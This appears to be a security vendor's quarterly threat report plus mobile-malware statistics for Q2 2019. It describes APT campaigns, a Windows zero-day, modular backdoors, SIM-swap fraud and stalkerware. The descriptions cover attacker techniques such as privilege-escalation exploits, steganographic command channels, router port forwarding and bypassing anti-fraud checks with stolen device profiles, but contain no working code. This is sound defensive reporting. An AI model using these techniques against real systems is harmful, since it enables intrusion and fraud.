Our most recent investigation shows that throughout 2018 the group used a multi-stage process to update each of its malware modules effectively while also evading detection. The group continues to use spear-phishing and known exploits as initial attack vectors. Once they have compromised a target, the attackers install an initial dropper, which uses a known exploit for CVE-2018-8120 to bypass Windows UAC, and execute the next payload, a downloader, with higher privileges. This connects to the C2 server to download the next payload, which they hide in an image using steganography. This is a full-featured backdoor and information exfiltration RAT (Remote Access Trojan) known as ROKRAT. This malware can download additional payloads, execute Windows commands, save screenshots and audio recordings, and exfiltrate files.

We also discovered an interesting piece of rare malware created by ScarCruft – a Bluetooth device harvester. They use this to collect information directly from infected devices, including device name, class, whether it’s connected to anything else, address, authentication state and whether it’s trusted or remembered.

We believe that ScarCruft is primarily targeting intelligence for political and diplomatic purposes. Our telemetry revealed several victims of this campaign – investment and trading companies in Vietnam and Russia that we believe may have links to North Korea. ScarCruft also attacked a diplomatic agency in Hong Kong and another diplomatic agency in North Korea.

We discovered that one victim from Russia had also triggered a malware detection while staying in North Korea in the past. This target had been infected with GreezeBackdoor, a tool of the DarkHotel APT group. The victim had also been attacked using the Konni malware – malware disguised as a North Korean news item in a weaponized document called ‘Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip’. This is not the first time that we have seen an overlap of ScarCruft and DarkHotel threat actors: it is something that members of our team have discussed at security conferences and we have shared details on the overlap with our threat intelligence customers in the past. Both threat actors are Korean speaking, although they seem to have different TTPs (Tactics, Techniques and Procedures).

To learn more about our intelligence reports, or to request more information on a specific report, please contact intelreports@kaspersky.com.

The Zebrocy multi-language malware salad

We recently reported on activity by the APT threat actor Zebrocy. This is a Russian-speaking group, with roots going back to 2013, which specializes in victim profiling and access. Zebrocy shares malware artefacts and more with both the Sofacy and BlackEnergy threat actors, suggesting that the group has a supportive role as a sub-group. Sofacy is believed by many to have targeted the 2016 US elections. BlackEnergy is the group behind the 2015 attacks on the Ukrainian power grid. In addition, another threat actor, Turla, deployed spear-phishing macros that were almost identical to previous, non-public Zebrocy code in 2018. It seems that Zebrocy is used to gain an initial foothold in target systems before the other groups deploy their destructive and espionage tools.

In its most recent campaign, Zebrocy used spear-phishing to deliver a new Nim downloader to targets across the globe – including targets in Germany, the UK, Afghanistan, Kazakhstan, Kyrgyzstan, Tajikistan, Turkmenistan, Syria, Iran, Myanmar and Tanzania.

Platinum returns

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and South East Asia. This campaign, which could date back to 2012, features a multi-stage approach. We dubbed it ‘EasternRoppels‘. The threat actor behind the campaign, which we believe to be the PLATINUM APT group, uses an elaborate, previously unseen, steganographic technique to conceal communication.

For this campaign, the operators used WMI (Windows Management Instrumentation) subscriptions to run an initial PowerShell downloader that drops a small PowerShell backdoor. We noticed that many of the initial WMI PowerShell scripts had different hardcoded C2 IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning that the malware only worked during a certain period every day). The C2 addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system, since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

We were investigating another threat at the same time, which we believe to be the second stage of the same campaign. After deeper analysis, we realized that the two threats were related: among other things, both attacks used the same domain to store exfiltrated data, and both types of malware infected some of the victims at the same time. In the second stage, all executable files were protected with a runtime cryptor and after unpacking them we found another, previously undiscovered, backdoor that is related to PLATINUM.

A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It’s also interesting that the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular.

The Gaza Cybergang SneakyPastes campaign

Gaza Cybergang is a politically motivated Arabic-language threat actor that is actively targeting the Middle East and North Africa, with particular focus on the Palestinian Territories. There has been confusion surrounding the group’s activities: notwithstanding the alignment of goals, the group’s activities seemed scattered and involved different tools and malware.

Our monitoring of the group’s activities in 2018 has led us to distinguish between three attack groups that operate under the umbrella of this threat actor – they are Gaza Cybergang Group1 (aka ‘MoleRATs’), Gaza Cybergang Group2 (aka ‘Desert Falcons‘) and Gaza Cybergang Group3 (aka ‘Operation Parliament‘). We have reported the activities of the last two in previous reports. Our latest report focuses on the first, Gaza Cybergang Group1 or MoleRATs.

This is the least sophisticated of the three attack groups and relies heavily on the use of paste sites, in an operation name ‘SneakyPastes’, to gradually sneak one or more remote access Trojans (RAT) onto victims’ systems. The group has been recorded employing phishing and several chained stages to try to evade detection and extend the life of their C2 servers. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking. Our telemetry shows there were victims in 39 countries, with most of the 240 unique victims located in the Palestinian Territories, followed by Jordan, Israel and Lebanon.

TajMahal: a sophisticated new APT framework

In autumn 2018, we discovered a previously unknown APT framework, which we named ‘TajMahal’, that had been active for the previous five years. It is a sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers; and even its own file indexer for the victim’s computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset.

There are two different packages, self-named ‘Tokyo’ and ‘Yokohama’ and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes.

The malware includes extensive functions for stealing data. This includes stealing cookies, intercepting documents in the printer queue, gathering data from backup copies of iOS devices, recording and taking screenshots of VoIP calls, stealing CD images made by the victim, indexing files, including those on external drives, and stealing data when the drive is subsequently detected again.

So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia.

FIN7 cybercrime operations continue

During 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some people believed that the arrest would have an impact on the group’s operations. This doesn’t seem to have been the case. In fact, CobaltGoblin and FIN7 have extended the number of groups operating under their umbrella: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or PoS infrastructure. It relies on a Griffon JScript backdoor and Cobalt/Meterpreter and, in recent attacks, PowerShell Empire. The second is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.

We believe with a reasonable level of confidence that the AveMaria botnet is linked to these two groups: AveMaria targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties with FIN7.

All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by the framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.

You can read more in our FIN7 report.

Zero-day vulnerability in win32k.sys

In March, our AEP (Automatic Exploit Prevention) technology detected an attempt to exploit a vulnerability in Windows. Further analysis led to us discovering a zero-day vulnerability in ‘win32k.sys’ – the fifth consecutive exploited Local Privilege Escalation vulnerability that we had discovered in recent months. We reported the vulnerability to Microsoft on March 17, who assigned it CVE-2019-0859 and released a patch on April 9.

This is a Use-After-Free vulnerability presented in the ‘CreateWindowEx’ function. The exploit we found in the wild was used to target 64-bit versions, from Windows 7 to the latest builds of Windows 10. Exploitation of the vulnerability allows the malware to download and execute a script written by the attackers, which in the worst-case scenario could provide an attacker with full control over the infected PC. The attackers were able to gain sufficient privileges to install a PowerShell backdoor and use this to obtain full access to the compromised computer.

Plurox: a modular backdoor

Earlier this year, we came across a curious backdoor that we named Plurox. Our analysis revealed that the malware has some quite unpleasant features. It can spread over a local network using an exploit, provide access to the attacked network and install miners and other malicious software on victims’ computers. The backdoor is also modular, so the attackers can expand its functionality using plugins, as required.

The malware can install one of several crypto-currency miners, depending on the system configuration. The bot sends a package with the system configuration to the C2 server and in response it receives information about which plugin to download. In all, we counted eight mining modules.

We also found a UPnP plugin. This module receives a subnet with mask /24 from the C2 server, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP addresses on the router using the UPnP protocol. If this is successful, it reports the result to the C2 server, waits for 300 seconds (five minutes) and then deletes the forwarded ports. We assume the attackers use this plugin to attack a local network. It would take an attacker just five minutes to sort through all the existing exploits for services running on these ports. If the administrators notice the attack on the host, they will see the attack coming directly from the router, not from a local machine. This attack, if successful, will help the cybercriminals gain a foothold in the network.

There is also an SMB module that’s responsible for spreading malware over the network using the EternalBlue exploit.

Other security news Digital doppelgangers

In April, we published the results of our investigation into Genesis, an e-shop that is trading over 60,000 stolen and legitimate digital identities. This marketplace, along with other malicious tools used by cybercriminals, is designed to abuse the machine learning-based anti-fraud approach of ‘digital masks’.

Every time we enter our financial, payment and personal information during an online transaction, anti-fraud solutions match us against a digital mask, a unique, trusted customer profile based on known device and behavior characteristics that allows the financial organization’s anti-fraud teams to determine if the transaction is legitimate.

However, a digital mask can be copied. Our investigation found that cybercriminals are actively using such ‘digital doppelgangers’ to bypass advanced anti-fraud measures. The Genesis dark net marketplace is an online shop selling stolen digital masks and user accounts at prices ranging from $5 to $200 each. Its customers simply buy previously stolen digital masks together with stolen logins and passwords to online shops and payment services, and then launch them through a browser and proxy connection to mimic real user activity. If they have the legitimate user’s account credentials, the attacker can then access their online accounts or make new, trusted transactions in their name.

Other tools enable attackers to create from scratch their own unique digital masks that will not trigger anti-fraud solutions. We investigated one such tool, a special Tenebris browser with an embedded configuration generator to develop unique fingerprints. Once created, a carder can simply launch the mask through a browser and proxy connection and conduct any operations online.

To enhance security, we recommend that businesses enable multi-factor authentication at every stage of the user validation processes, consider introducing additional methods of verification, such as biometrics, harness the most advanced analytics for user behavior and integrate threat intelligence feeds into SIEM and other security controls in order to get access to the most relevant and up-to-date threat data.

Potential problems with third-party plugins

We recently looked at plugins and some of the potential problems with plugins.

Online stores, information portals and other resources are often based on platforms that provide developers with a set of ready-made tools. Features they need are usually available as plugins, allowing them to cherry-pick the functionality they need. Plugins are small software modules that either add to, or improve, the functionality of a website, for example, to display social network widgets, harvest statistics or to create surveys and other types of content. Plugins save developers from having to reinvent the wheel every time they need a particular feature.

However, things can go wrong. Plugins run automatically and don’t make their presence known unless something goes wrong. If the creator of the plugin abandons it, or sells it to another developer, it will not necessarily be apparent. If a plugin isn’t updated for a long time, it’s likely to contain unpatched vulnerabilities that could be exploited to take control of a web site or download malware. Even when updates are available, website owners often overlook them; and vulnerable modules can remain active years after the developer has withdrawn support for them.

Some content management platforms block the download of unsupported modules. However, it is not possible for a developer to delete vulnerable plugins from users’ websites, since this could cause disruption. Moreover, abandoned plugins might be stored, not on the platform itself, but on publicly available services. When the creator discontinues support or deletes a module, a website will continue to access the container in which it was located. Cybercriminals can easily capture or clone this abandoned container, forcing the resource to download malware instead of the plugin.

This is what happened with the New Share Counts tweet counter, hosted on Amazon S3 cloud storage. The developer posted a message on their website saying that they had withdrawn support for the plugin, but more than 800 clients did not read it. When the plugin writer later closed the container on Amazon S3, the cybercriminals created their own storage with the exact same name and put a malicious script inside it. Websites still using the plugin began to load the new code, which redirected users to a phishing resource promising a prize for taking part in a survey, rather than the tweet counter. Something similar can happen if a developer decides to sell their plugin and isn’t choosy about who they sell it to.

We recommend that companies independently monitor the security of plugins on their website and take appropriate action to ensure that they are safe.

Game of threats

Torrent sites have always been the go-to places for those seeking pirated versions of games and other software, as well as Hollywood blockbusters. However, in recent years, popular TV shows have joined the list of content on such sites. This provides opportunities for cybercriminals to spread malware. One study, conducted in 2015, reported that bootlegged content accounts for 35% of files shared via BitTorrent; and more than 99% of the counterfeit files analyzed linked to either malware or scam websites.

We recently looked at threats disguised as new episodes of popular TV shows distributed through torrent sites, to see which ones were the most popular and what kinds of threats cybercriminals are distributing in this way. The total number of people who encountered malware related to a TV show in 2018 was 126,340: this is around a third less than in 2017, but still a significant number. The top three TV shows most often used as bait are Game of Thrones, The Walking Dead and Arrow. Game of Thrones accounted for 17% of pirated content, even though this was the only TV show in our list that did not screen any new episodes in 2018. The top three most popular threat categories were Trojan, Downloader and AdWare. The full details are included in our report, including our tips on how to avoid threats coming from content distributing platforms.

Many people choose to stream TV content these days. This also provides opportunities for cybercriminals who claim to provide free downloads in return for the personal data of anyone who wants to view content without paying for it, or to those who live in a region where the content is not available. This year’s Game of Thrones premiere broke records; and we saw a spike in cybercriminal activity related to the show: the number of attacks almost quadrupled following the premiere.

Large-scale SIM-swap fraud

SIM-swap fraud occurs when a criminal masquerades as a customer of a mobile phone operator and persuades the company to give them a replacement SIM. They use stolen personal details to impersonate the victim. The new SIM gives the criminal control of the victim’s mobile phone number, allowing them to assume the victim’s identity. If the victim has opted to receive one-time passcodes via SMS, the criminal can use these, with other stolen credentials, to obtain access to their online accounts, including their bank account.

We recently investigated SIM-swap fraud in Brazil and Mozambique. Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow people to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. However, criminals are using SIM-swap fraud to target mobile payments; and people are losing money on a major scale.

Fraudsters use social engineering, bribery, or even a simple phishing attack to take control of customers’ phone numbers and intercept mobile money transactions or one-time passcodes to complete a transfer of funds or steal people’s money.

In Mozambique, this sort of crime has been widely reported in the national news, with the media questioning the integrity of the banks and mobile operators, suggesting that they may be colluding in the scams. Since the reputation of the banks and operators was at stake, they had to take urgent action to protect their customers. At Mozambique’s largest bank, they had a monthly average of 17.2 cases of SIM-swap fraud, but the true impact nationwide is difficult to estimate, as most banks don’t publicly share statistics. Some of the victims were high-profile business people, who had up to US$50,000 stolen from their accounts.

In Brazil, the problem also affected politicians, ministers, governors and high-profile business people, as well as ordinary citizens. One organized gang alone in Brazil was able to SIM-swap 5,000 victims.

Our report outlines the problem faced in both countries and a local solution developed in Mozambique that drastically reduced the level of fraud.

The problems with legal spyware

Spyware might sound like something from a Hollywood movie, but you can buy commercial versions of such programs – known as ‘stalkerware’ – for just a few dollars. They let you spy on someone simply by installing an app on their smartphone or tablet. Once installed, such apps remain hidden and provide access to a range of personal data, including device location, browsing history, SMS messages, social media chats and more. Some even make video and voice recordings.

Such apps are usually legal, which is why we identify them formally as ‘not-a-virus: Monitor’ when alerting someone to their presence. Their developers often market them as parental control software; and significant numbers of people download and use them – in 2018, we detected stalkerware on the devices of more than 58,000 people.

Leaving aside the moral aspects of installing such apps on someone else’s device, there are several things that make them a bad idea.

Most of these apps fail to comply with the policies of official stores such as Google Play. So they tend to be found on dedicated sites that are ‘off the beaten track’; and by requiring the user to enable the installation of apps outside the official store, make the device vulnerable to attack.

Stalkerware apps often request system rights, sometimes including root access, giving the app full control of the device, including the right to install other apps. Some also insist that the person using the device allow them to deactivate or remove protection solutions.

These apps upload personal data from the device to the vendor’s server, where the person who installed the app can review it. However, the lack of security could expose that data to hackers.

Legitimate apps, unlike stalkerware, do not hide themselves on the device, deactivate security solutions or pose a threat to the privacy of their customers. They are also available in official marketplaces.

To protect yourself from stalkerware, secure your devices with a strong password and don’t disclose it to anyone, block installation of third-party apps, check installed apps regularly, delete any that you don’t need and protect your devices with a reputable security product.

The WhatsApp call that opens up a device to surveillance

A zero-day vulnerability in WhatsApp, reported in May, allowed an attacker to eavesdrop on devices running the app. The attacker could read encrypted chats, turn on the microphone and camera and install spyware to allow further surveillance, such as browsing through the victim’s photos and videos, accessing their contact list and more.

To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The attackers used this method, not only to snoop on people’s chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device.

The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released patches for the vulnerability on May 13. Some have suggested that the spyware may be Pegasus, developed by Israeli company NSO.

High severity bugs in VLC media player

In June, VideoLAN, the developers of the open source VLC media player, issued patches for two high-severity bugs – an out-of-bound write vulnerability and a stack-buffer-overflow bug. These were two of 33 fixes issued in the wake of a new bug bounty program funded by the European Commission as part of the Free and Open Source Software Audit (FOSSA) project. You can read more here.

Smart speakers listeners

Amazon has come under fire for its privacy policies following a report by Bloomberg that the company hires auditors to listen to Amazon Echo recordings, in an effort to improve the ability of its digital assistant to understand human speech. The team of auditors listens to voice recordings after the word ‘Alexa’ is used to wake up the device and picks a small number of interactions from a random set of users to annotate. One especially alarming aspect of the report is the suggestion that, although Amazon provides customers with an opt-out, recordings sometimes start without the device ‘hearing’ the wake-word.

Amazon recently filed a patent based on the idea of ‘voice-sniffing’ that would allow its smart speaker to eavesdrop on all conversations and analyze them. If implemented, such technology would allow the company to listen-in to unguarded conversations, undermining people’s privacy. It would also provide Amazon with a wealth of data that it could use for targeted advertising.

Growing numbers of people are taking advantage of the convenience that smart speakers offer. However, remember that they are also smart listeners. You should review the privacy settings of any smart device that you buy and disable any functionality that you’re not comfortable with.

Privacy matters

Personal information is a valuable commodity. The value of personal data is evident from the steady stream of data breaches reported in the news. Sometimes, we are tricked into exposing confidential data – maybe because we’re too eager to click on attachments or links in email messages, or because we’re not careful enough when looking for a good deal online. However, sometimes our personal information is exposed when an online provider fails to secure it properly.

There’s not much we can do to prevent the loss or theft of data from an online company. However, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, by using two-factor authentication and by restricting the amount of data that we choose to share online.

Information is valuable not just to cybercriminals, but to legitimate companies. Often, it is the ‘price’ we pay for ‘free’ products and services, including browsers, email accounts and social network accounts. It’s not always clear how our data will be used by online providers, so it’s essential to check the privacy settings carefully and opt out of anything you’re not comfortable with. Of course, where it’s not possible to opt out, you may need to think again about signing up for the service, or deleting your account if you have already done so.

In May, we illustrated some of these issues by looking back at some of the scandals surrounding Facebook’s handling of personal data over the last two years.

2019. augusztus 19.

IT threat evolution Q2 2019. Statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
  • 217,843,293 unique URLs triggered Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.
  • Ransomware attacks were defeated on the computers of 232,292 unique users.
  • Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 753,550 malicious installation packages
    • 13,899 installation packages for mobile banking Trojans
    • 23,294 installation packages for mobile ransomware Trojans
Mobile threats Quarterly highlights

Q2 2019 will be remembered for several events.

First, we uncovered a large-scale financial threat by the name of Riltok, which targeted clients of not only major Russian banks, but some foreign ones too.

Second, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.

Third, we repeated our study of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.

Fourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. “Supposedly” because ads are also shown in background mode, when the victim might not be using the device.

Fifth, our attention was caught by the Hideapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.

Finally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia’s largest IT companies:

Mobile threat statistics

In Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of detected malicious installation packages, Q3 2018 – Q2 2019 (download)

What’s more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families.

Distribution of detected mobile apps by type

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of newly detected mobile apps by type, Q1 and Q2 2019 (download)

Among all the threats detected in Q2 2019, the lion’s share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).

In second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).

Trojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) – this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.

Threats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.

In Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the Asacub family. The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 44.37 2 Trojan.AndroidOS.Boogr.gsh 11.31 3 DangerousObject.AndroidOS.GenericML 5.66 4 Trojan.AndroidOS.Hiddapp.cr 4.77 5 Trojan.AndroidOS.Hiddapp.ch 4.17 6 Trojan.AndroidOS.Hiddapp.cf 2.81 7 Trojan.AndroidOS.Hiddad.em 2.53 8 Trojan-Dropper.AndroidOS.Lezok.p 2.16 9 Trojan-Dropper.AndroidOS.Hqwar.bb 2.08 10 Trojan-Banker.AndroidOS.Asacub.a 1.93 11 Trojan-Banker.AndroidOS.Asacub.snt 1.92 12 Trojan-Banker.AndroidOS.Svpeng.ak 1.91 13 Trojan.AndroidOS.Hiddapp.cg 1.89 14 Trojan.AndroidOS.Dvmap.a 1.88 15 Trojan-Dropper.AndroidOS.Hqwar.gen 1.86 16 Trojan.AndroidOS.Agent.rt 1.81 17 Trojan-SMS.AndroidOS.Prizmes.a 1.58 18 Trojan.AndroidOS.Fakeapp.bt 1.58 19 Trojan.AndroidOS.Agent.eb 1.49 20 Exploit.AndroidOS.Lotoor.be 1.46

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked.

As per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

Fourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.

Eighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.

Ninth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.

Tenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.

Geography of mobile threats

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile malware infection attempts, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile malware Country* %** 1 Iran 28.31 2 Bangladesh 28.10 3 Algeria 24.77 4 Pakistan 24.00 5 Tanzania 23.07 6 Nigeria 22.69 7 India 21.65 8 Indonesia 18.13 9 Sri Lanka 15.96 10 Kenya 15.38

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country.

At the head of Q2’s Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.

Most often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).

Like Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).

Third place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.

Mobile banking Trojans

In the reporting period, we detected 13,899 installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.

The largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 – Q2 2019 (download)

Top 10 mobile banking Trojans

Verdict %* 1 Trojan-Banker.AndroidOS.Asacub.a 13.64 2 Trojan-Banker.AndroidOS.Asacub.snt 13.61 3 Trojan-Banker.AndroidOS.Svpeng.ak 13.51 4 Trojan-Banker.AndroidOS.Svpeng.q 9.90 5 Trojan-Banker.AndroidOS.Agent.ep 9.37 6 Trojan-Banker.AndroidOS.Asacub.ce 7.75 7 Trojan-Banker.AndroidOS.Faketoken.q 4.18 8 Trojan-Banker.AndroidOS.Asacub.cs 4.18 9 Trojan-Banker.AndroidOS.Agent.eq 3.81 10 Trojan-Banker.AndroidOS.Faketoken.z 3.13

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats.

Almost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family’s distribution bursts that we registered last quarter were not repeated this time.

As in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.

